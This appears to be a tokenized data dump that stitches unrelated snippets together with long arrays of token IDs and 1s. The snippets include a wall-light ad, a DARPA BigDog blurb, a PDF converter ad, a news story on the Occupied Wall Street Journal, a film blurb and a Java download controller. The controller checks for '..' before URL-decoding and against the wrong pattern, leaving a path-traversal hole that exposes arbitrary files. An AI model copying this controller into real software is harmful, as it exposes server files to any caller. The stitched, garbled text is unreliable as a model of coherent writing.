[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
The Endurance wall pack collection features a patent pending design for water and dust proofing, encased in an IP66 rated factory sealed light engine. Thermally engineered for up to 100,000 hours of rated life, the Endurance virtually eliminates any need for maintenance once ...
[ 1, 450, 2796, 18541, 10090, 4870, 4333, 5680, 13, 29874, 2373, 296, 28235, 2874, 363, 4094, 322, 19786, 5296, 292, 29892, 2094, 1463, 297, 385, 5641, 29953, 29953, 364, 630, 12529, 409, 7943, 3578, 6012, 29889, 498, 837, 635, 6012, 14561, 363, 701, 304, 29871, 29896, 29900, 29900, 29892, 29900, 29900, 29900, 6199, 310, 364, 630, 2834, 29892, 278, 2796, 18541, 4610, 1474, 10397, 1078, 738, 817, 363, 25413, 2748, 2023 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
DARPA big dog Comments (0) Transcript of DARPA big dog The DARPA Big Dog BigDog is 3 feet long, stands 2.5 feet tall, and weighs 240 lbs. Big Dog serves as a robotic pack mule and can carry over 400 lbs of objects. Founded by the Defence Advanced Research Projects Agency. BigDog can walk over very rugged terrain The Big dog (LS3 version) can create fire and provide temporary shelter. BigDog has a stereo vision system
[ 1, 360, 1718, 7228, 4802, 11203, 13, 13, 1523, 1860, 313, 29900, 29897, 13, 13, 4300, 924, 310, 360, 1718, 7228, 4802, 11203, 13, 13, 1576, 360, 1718, 7228, 7997, 18776, 7997, 29928, 468, 338, 29871, 29941, 6900, 1472, 29892, 15028, 29871, 29906, 29889, 29945, 6900, 15655, 29892, 322, 591, 1141, 29879, 29871, 29906, 29946, 29900, 301, 5824, 29889, 7997, 18776, 19700, 408, 263, 19964, 293, 4870, 286, 1297, 322, 508, 8677, 975, 29871, 29946, 29900, 29900, 301, 5824, 310, 3618, 29889, 383, 7261, 491, 278, 5282, 663, 29287, 10550, 8010, 29879, 29353, 29889, 7997, 29928, 468, 508, 6686, 975, 1407, 29833, 3192, 28439, 450, 7997, 11203, 313, 8547, 29941, 1873, 29897, 508, 1653, 3974, 322, 3867, 13201, 27709, 29889, 7997, 29928, 468, 756, 263, 269, 12358, 29877, 18551, 1788 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
More generally, if you are trying to do something extremely common, the chances are that whatever framework you’re using, there’s a method or function somewhere in there which will do it for you. And it will almost certainly do it much better than your home-brewed solution will.
[ 1, 5853, 6892, 29892, 565, 366, 526, 1811, 304, 437, 1554, 14154, 3619, 29892, 278, 521, 2925, 526, 393, 6514, 6890, 366, 30010, 276, 773, 29892, 727, 30010, 29879, 263, 1158, 470, 740, 9051, 297, 727, 607, 674, 437, 372, 363, 366, 29889, 1126, 372, 674, 4359, 8959, 437, 372, 1568, 2253, 1135, 596, 3271, 29899, 1030, 8734, 1650, 674, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
4Media PDF to PowerPoint Converter can easily and quickly convert PDF to PowerPoint (PPT) presentations in editable format which allows you to edit and copy contents. Besides, the PDF to PPT converter doesn't require Adobe Reader or Adobe Acrobat installed for PDF to PPT conversion. With the PDF to PPT creator, you can specify the PDF page range that you want to convert, only a few or all pages to convert. Moreover, the application preserves the original images, tables, hyperlinks and layouts in the generated PPT files after conversion. And it supports Microsoft 2010, 2007, and 2003.
[ 1, 29871, 29946, 10572, 11328, 304, 9206, 5228, 1281, 13549, 508, 5948, 322, 9098, 3588, 11328, 304, 9206, 5228, 313, 29925, 7982, 29897, 2198, 800, 297, 3863, 519, 3402, 607, 6511, 366, 304, 3863, 322, 3509, 8118, 29889, 19065, 29892, 278, 11328, 304, 349, 7982, 29105, 1838, 29915, 29873, 1996, 2087, 16945, 830, 1664, 470, 2087, 16945, 7255, 307, 10222, 5130, 363, 11328, 304, 349, 7982, 11301, 29889, 13, 13, 3047, 278, 11328, 304, 349, 7982, 907, 1061, 29892, 366, 508, 6084, 278, 11328, 1813, 3464, 393, 366, 864, 304, 3588, 29892, 871, 263, 2846, 470, 599, 6515, 304, 3588, 29889, 12808, 29892, 278, 2280, 2225, 20098, 278, 2441, 4558, 29892, 6131, 29892, 11266, 4965, 322, 5912, 29879, 297, 278, 5759, 349, 7982, 2066, 1156, 11301, 29889, 1126, 372, 11286, 7783, 29871, 29906, 29900, 29896, 29900, 29892, 29871, 29906, 29900, 29900, 29955, 29892, 322, 29871, 29906, 29900, 29900, 29941, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
“The act of one person giving another person a newspaper is important,” said Arun Gupta, one of dozens of people who helped put together The Occupied Wall Street Journal. “We wanted to come up with something that was beautifully designed and well-written that gives a tangible form to what is under way.” A call for the financing of the pop-up, instant newspaper went out on Kickstarter.com at the end of last month. An ad hoc group set out to raise $12,000 and has now surpassed $75,000. The initial print run of 50,000 was augmented with an extra 20,000 copies as the money rolled in, with promotional assists from Michael Moore, Andy Bichlbaum of the performance artists the Yes Men, and others. Mr. Gupta edited the newspaper, along with Michael Levitin, a former Associated Press journalist, and Jed Brandt, a writer and activist, was the lead designer. Dozens of other people pitched in. A second issue hit the streets on Saturday, along with a Spanish edition of the first issue. Mr. Gupta is a longtime newspaperman, having published The Indypendent, a free, left-leaning newspaper that circulates to 20,000 readers in print and online, primarily in New York, 16 times a year. The Occupied Wall Street Journal is not the “official” newspaper of the protest because nothing is official in the world of Occupy Wall Street. Mr. Gupta said that consensus was the core principle governing the protest, but something more entrepreneurial was required to get an actual newspaper out. Although the sentiment and some of the informational anarchy of the event is reflected in the newspaper, it is produced by experienced, if far from objective, journalists. (You can get a PDF of the newspaper at bit.ly/qi05ls.) “We didn’t think there would be much in the way of coverage of the event, so we thought it was important that there be a media outlet that reflected what was under way,” Mr. Gupta said. “A newspaper is tactile, engages all of the senses, and leads to more immersive reading than what people might do online.”
[ 1, 1346, 1576, 1044, 310, 697, 2022, 6820, 1790, 2022, 263, 19656, 338, 4100, 3995, 1497, 826, 348, 2088, 28363, 29892, 697, 310, 437, 29920, 575, 310, 2305, 1058, 9213, 1925, 4208, 450, 16117, 786, 1000, 14406, 7103, 8237, 29889, 1346, 4806, 5131, 304, 2041, 701, 411, 1554, 393, 471, 9560, 368, 8688, 322, 1532, 29899, 17625, 393, 4076, 263, 18806, 1821, 883, 304, 825, 338, 1090, 982, 3178, 319, 1246, 363, 278, 11782, 3277, 310, 278, 1835, 29899, 786, 29892, 14426, 19656, 3512, 714, 373, 476, 860, 303, 4254, 29889, 510, 472, 278, 1095, 310, 1833, 4098, 29889, 530, 594, 298, 542, 2318, 731, 714, 304, 12020, 395, 29896, 29906, 29892, 29900, 29900, 29900, 322, 756, 1286, 1190, 3364, 287, 395, 29955, 29945, 29892, 29900, 29900, 29900, 29889, 450, 2847, 1596, 1065, 310, 29871, 29945, 29900, 29892, 29900, 29900, 29900, 471, 18765, 287, 411, 385, 4805, 29871, 29906, 29900, 29892, 29900, 29900, 29900, 14591, 408, 278, 6909, 29081, 297, 29892, 411, 2504, 327, 1848, 1223, 2879, 515, 5765, 18588, 29892, 21828, 350, 436, 29880, 29602, 310, 278, 4180, 17906, 278, 3869, 7567, 29892, 322, 4045, 29889, 3237, 29889, 2088, 28363, 8788, 278, 19656, 29892, 3412, 411, 5765, 20708, 277, 262, 29892, 263, 4642, 6853, 630, 5254, 24452, 29892, 322, 18847, 18007, 29873, 29892, 263, 9227, 322, 5039, 391, 29892, 471, 278, 3275, 23383, 29889, 1938, 29920, 575, 310, 916, 2305, 15905, 287, 297, 29889, 319, 1473, 2228, 7124, 278, 19756, 373, 24211, 29892, 3412, 411, 263, 10432, 12203, 310, 278, 937, 2228, 29889, 13, 13, 20335, 29889, 2088, 28363, 338, 263, 1472, 2230, 14578, 481, 3504, 29892, 2534, 6369, 450, 1894, 1478, 3906, 29892, 263, 3889, 29892, 2175, 29899, 14044, 292, 19656, 393, 18342, 1078, 304, 29871, 29906, 29900, 29892, 29900, 29900, 29900, 22176, 297, 1596, 322, 7395, 29892, 19434, 297, 1570, 3088, 29892, 29871, 29896, 29953, 3064, 263, 1629, 29889, 13, 13, 1576, 16117, 786, 1000, 14406, 7103, 8237, 338, 451, 278, 1346, 29877, 7880, 30024, 19656, 310, 278, 10021, 1363, 3078, 338, 6221, 297, 278, 3186, 310, 16117, 786, 29891, 14406, 7103, 29889, 3237, 29889, 2088, 28363, 1497, 393, 1136, 8841, 471, 278, 7136, 12502, 14765, 1076, 278, 10021, 29892, 541, 1554, 901, 23440, 1600, 332, 616, 471, 3734, 304, 679, 385, 3935, 19656, 714, 29889, 13, 13, 2499, 3592, 278, 19688, 322, 777, 310, 278, 1871, 1288, 385, 12040, 310, 278, 1741, 338, 25312, 297, 278, 19656, 29892, 372, 338, 7371, 491, 18860, 29892, 565, 2215, 515, 12091, 29892, 8955, 2879, 29889, 313, 3492, 508, 679, 263, 11328, 310, 278, 19656, 472, 2586, 29889, 368, 29914, 26461, 29900, 29945, 3137, 1846, 1346, 4806, 3282, 30010, 29873, 1348, 727, 723, 367, 1568, 297, 278, 982, 310, 23746, 310, 278, 1741, 29892, 577, 591, 2714, 372, 471, 4100, 393, 727, 367, 263, 5745, 714, 1026, 393, 25312, 825, 471, 1090, 982, 3995, 3237, 29889, 2088, 28363, 1497, 29889, 1346, 29909, 19656, 338, 28476, 488, 29892, 3033, 1179, 599, 310, 278, 4771, 267, 29892, 322, 11981, 304, 901, 5198, 414, 573, 5183, 1135, 825, 2305, 1795, 437, 7395, 3178 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Vampyros Lesbos After watching a scary S&M act at a club, Linda flies to Istanbul to see the Countess Nadine for work. But when she lands, Linda realizes Nadine (the legendary Soledad Miranda) is the same kinky vixen from the nightclub. As Linda falls under Nadine’s spell, she risks becoming a vampire herself - but, like, so what? Aided by a legendary psychedelic soundtrack, Jess Franco's biggest hit put a queer spin on classic vampire tropes, resulting in what Franco expert Stephen Thrower describes as a cross between a “sun-drenched erotic daydream and a humid sexual nightmare”. Jess Franco’s most famous film is this wildly-stylish 1970 lesbian vampire classic.
[ 1, 478, 1160, 29891, 1883, 2664, 27737, 13, 13, 13555, 21217, 263, 885, 653, 317, 29987, 29924, 1044, 472, 263, 4402, 29892, 365, 11054, 285, 3687, 304, 11066, 273, 8645, 304, 1074, 278, 3917, 404, 18496, 457, 363, 664, 29889, 1205, 746, 1183, 12625, 29892, 365, 11054, 1855, 7093, 18496, 457, 313, 1552, 15983, 653, 1105, 839, 328, 11612, 5863, 29897, 338, 278, 1021, 413, 682, 29891, 325, 27332, 515, 278, 4646, 29066, 29889, 1094, 365, 11054, 20074, 1090, 18496, 457, 30010, 29879, 24779, 29892, 1183, 5161, 2039, 14171, 263, 325, 1160, 533, 8735, 448, 541, 29892, 763, 29892, 577, 825, 29973, 319, 2618, 491, 263, 15983, 653, 11643, 287, 295, 293, 6047, 11294, 29892, 23010, 20923, 29915, 29879, 24842, 7124, 1925, 263, 712, 261, 10917, 373, 22037, 325, 1160, 533, 9201, 267, 29892, 9819, 297, 825, 20923, 17924, 14317, 498, 307, 556, 16612, 408, 263, 4891, 1546, 263, 1346, 11445, 29899, 29881, 4615, 287, 604, 13574, 2462, 29881, 1633, 322, 263, 3165, 333, 18287, 4646, 29885, 598, 8643, 13, 13, 29967, 404, 20923, 30010, 29879, 1556, 13834, 2706, 338, 445, 8775, 368, 29899, 22062, 1674, 29871, 29896, 29929, 29955, 29900, 966, 22863, 325, 1160, 533, 22037, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
/** * Copyright (c) 2005-2012 https://github.com/zhangkaitao * * Licensed under the Apache License, Version 2.0 (the "License"); */ package com.sishuok.es.common.web.controller; import com.sishuok.es.common.Constants; import com.sishuok.es.common.web.upload.FileUploadUtils; import com.sishuok.es.common.web.utils.DownloadUtils; import org.apache.commons.lang3.StringUtils; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestParam; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.net.URLDecoder; /** * 文件上传/下载 * <p>User: Zhang Kaitao * <p>Date: 13-2-11 上午8:46 * <p>Version: 1.0 */ @Controller public class DownloadController { /** * 下载内容前边显示的前缀 */ private String prefixFilename = "[es脚手架]"; @RequestMapping(value = "/download") public String download( HttpServletRequest request, HttpServletResponse response, @RequestParam(value = "filename") String filename) throws Exception { filename = filename.replace("/", "\\"); if (StringUtils.isEmpty(filename) || filename.contains("\\.\\.")) { response.setContentType("text/html;charset=utf-8"); response.getWriter().write("您下载的文件不存在!"); return null; } filename = URLDecoder.decode(filename, Constants.ENCODING); String filePath = FileUploadUtils.extractUploadDir(request) + "/" + filename; DownloadUtils.download(request, response, filePath, prefixFilename + filename); return null; } }
[ 1, 7762, 13, 334, 14187, 1266, 313, 29883, 29897, 29871, 29906, 29900, 29900, 29945, 29899, 29906, 29900, 29896, 29906, 2045, 597, 3292, 29889, 510, 29914, 29920, 11895, 29895, 1249, 6241, 13, 334, 13, 334, 10413, 21144, 1090, 278, 13380, 19245, 29892, 10079, 29871, 29906, 29889, 29900, 313, 1552, 376, 29931, 293, 1947, 1496, 13, 3776, 13, 5113, 419, 29889, 29879, 728, 29884, 554, 29889, 267, 29889, 9435, 29889, 2676, 29889, 8299, 29936, 13, 13, 5215, 419, 29889, 29879, 728, 29884, 554, 29889, 267, 29889, 9435, 29889, 26570, 29936, 13, 5215, 419, 29889, 29879, 728, 29884, 554, 29889, 267, 29889, 9435, 29889, 2676, 29889, 9009, 29889, 2283, 17553, 12177, 29936, 13, 5215, 419, 29889, 29879, 728, 29884, 554, 29889, 267, 29889, 9435, 29889, 2676, 29889, 13239, 29889, 22954, 12177, 29936, 13, 5215, 1638, 29889, 4288, 29889, 22382, 29889, 3893, 29941, 29889, 1231, 12177, 29936, 13, 5215, 1638, 29889, 6688, 29889, 303, 406, 327, 668, 29889, 2956, 29936, 13, 5215, 1638, 29889, 6688, 29889, 2676, 29889, 5355, 29889, 18317, 29889, 3089, 15845, 29936, 13, 5215, 1638, 29889, 6688, 29889, 2676, 29889, 5355, 29889, 18317, 29889, 3089, 4736, 29936, 13, 13, 5215, 11317, 29889, 12144, 29889, 1124, 29889, 5506, 10735, 3089, 29936, 13, 5215, 11317, 29889, 12144, 29889, 1124, 29889, 5506, 10735, 5103, 29936, 13, 5215, 2115, 29889, 1212, 29889, 4219, 6185, 6119, 29936, 13, 13, 7918, 13, 334, 29871, 30333, 30631, 30429, 31471, 29914, 30557, 31526, 13, 334, 529, 29886, 29958, 2659, 29901, 796, 11895, 476, 1249, 6241, 13, 334, 529, 29886, 29958, 2539, 29901, 29871, 29896, 29941, 29899, 29906, 29899, 29896, 29896, 29871, 30429, 232, 144, 139, 29947, 29901, 29946, 29953, 13, 334, 529, 29886, 29958, 6594, 29901, 29871, 29896, 29889, 29900, 13, 3776, 13, 29992, 2956, 13, 3597, 770, 25553, 2956, 426, 13, 13, 1678, 7762, 13, 268, 334, 29871, 30557, 31526, 30728, 31294, 30658, 31993, 31542, 30858, 30210, 30658, 234, 191, 131, 13, 268, 3776, 13, 1678, 2024, 1714, 10944, 3434, 3871, 353, 14704, 267, 235, 135, 157, 30880, 233, 161, 185, 29962, 1769, 13, 13, 13, 1678, 732, 3089, 15845, 29898, 1767, 353, 5591, 10382, 1159, 13, 1678, 970, 1714, 5142, 29898, 13, 9651, 9056, 10735, 3089, 2009, 29892, 9056, 10735, 5103, 2933, 29892, 13, 9651, 732, 3089, 4736, 29898, 1767, 353, 376, 9507, 1159, 1714, 10422, 29897, 8026, 8960, 426, 13, 13, 13, 4706, 10422, 353, 10422, 29889, 6506, 11974, 613, 376, 1966, 1496, 13, 13, 4706, 565, 313, 1231, 12177, 29889, 24326, 29898, 9507, 29897, 3830, 10422, 29889, 11516, 703, 1966, 29889, 1966, 1213, 876, 426, 13, 9651, 2933, 29889, 842, 3916, 1542, 703, 726, 29914, 1420, 29936, 3090, 842, 29922, 9420, 29899, 29947, 1496, 13, 9651, 2933, 29889, 657, 10507, 2141, 3539, 703, 233, 133, 171, 30557, 31526, 30210, 30333, 30631, 30413, 30946, 30505, 30584, 1496, 13, 9651, 736, 1870, 29936, 13, 4706, 500, 13, 4706, 10422, 353, 3988, 6185, 6119, 29889, 13808, 29898, 9507, 29892, 5798, 1934, 29889, 1430, 3217, 29928, 4214, 416, 13, 13, 4706, 1714, 934, 2605, 353, 3497, 17553, 12177, 29889, 21111, 17553, 9170, 29898, 3827, 29897, 718, 5591, 29908, 718, 10422, 29936, 13, 13, 4706, 25553, 12177, 29889, 10382, 29898, 3827, 29892, 2933, 29892, 934, 2605, 29892, 10944, 3434, 3871, 718, 10422, 416, 13, 13, 4706, 736, 1870, 29936, 13, 1678, 500, 13, 13, 13, 13, 13, 29913, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
